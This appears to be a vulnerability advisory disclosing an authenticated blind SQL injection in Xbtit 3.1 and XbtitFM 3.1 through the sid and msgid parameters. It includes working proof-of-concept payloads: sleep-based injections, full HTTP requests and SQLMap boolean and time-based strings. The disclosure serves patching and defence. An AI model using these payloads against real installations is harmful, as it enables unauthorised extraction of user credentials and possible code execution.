SQL Injection
A blind SQL Injection vulnerability exists in Xbtit 3.1 and XbtitFM 3.1 via the sid parameter (GET) in /ajaxchat/getHistoryChatData.php file that is accessible by a simple registered user with default privileges. As a result a malicious user can extract sensitive data such as usernames and passwords and in some cases use this vulnerability in order to gain remote code execution.
——————————————
[Vulnerability Type]
SQL Injection
——————————————
[Vendor of Product]
Btiteam
https://github.com/btiteam/xbtit-3.1
——————————————
[Affected Product Code Base]
Xbtit 3.1
https://github.com/btiteam/xbtit-3.1/ (Latest as of 22-12-2021)
https://github.com/btiteam/xbtit-3.1/blob/master/ajaxchat/getHistoryChatData.php
XbtitFM 3.1 (Private source code thus not available to analyze further)
https[://]xbtit.eu/xbtitfm/
XbtitFM is using xbtit’s core with additional features. It is also affected by the same issue and additionally on the extra file (/chatedit.php) and vulnerable GET id parameter (msgid) that offer similar functionality.
——————————————
[Attack Type]
Remote – Authenticated
——————————————
[Impact Information Disclosure]
True
——————————————
[PoC]
Login as a simple user make a comment in the chat box. The sid parameter is vulnerable to an authenticated blind SQL injection. Use the following PoC and cause a sleep delay for 20 seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the sid parameter must be a valid chat message id you have already generated!
http://xbtit.local/xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit
Original request
Modified request to include SQLi payload
GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit HTTP/1.1 Host: xbtit.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php?page=allshout Cookie: ajax_poller_1=1; uid=6; pass=e6d36bba3f1b36152182ad0093441345; PHPSESSID=oe2bebgui5b6dhoavg59n3nnmf Upgrade-Insecure-Requests: 1
SQLMap payloads
Boolean-based blind payload: page=allshout&sid=2201 AND 5205=5205&edit Time-based blind payload: page=allshout&sid=2201 AND (SELECT 8933 FROM (SELECT(SLEEP(5)))gkzE)&edit
XbtitFM 3.1 (Private source code) is using xbtit’s core with additional features. It is also affected by the same issue and additionally on the extra file named (/chatedit.php) and vulnerable GET id parameter (msgid) that offer almost similar functionality.
So we can apply the same on /chatedit.php instead of /getHistoryChatData.php and msgid (GET) instead of sid (GET) parameter.
GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1 Host: xbtit.local Cookie: uid=4; pass=f530298bfc5cd53f7316fb2f1fe34a52; PHPSESSID=f3vdo18n1t834jg6d6ok3lch36 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Te: trailers Connection: close
Use the following PoC and cause a sleep delay for 20 seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the msgid parameter must be a valid chat message id you have already generated!
GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20
[Reference]
https://github.com/btiteam/xbtit-3.1/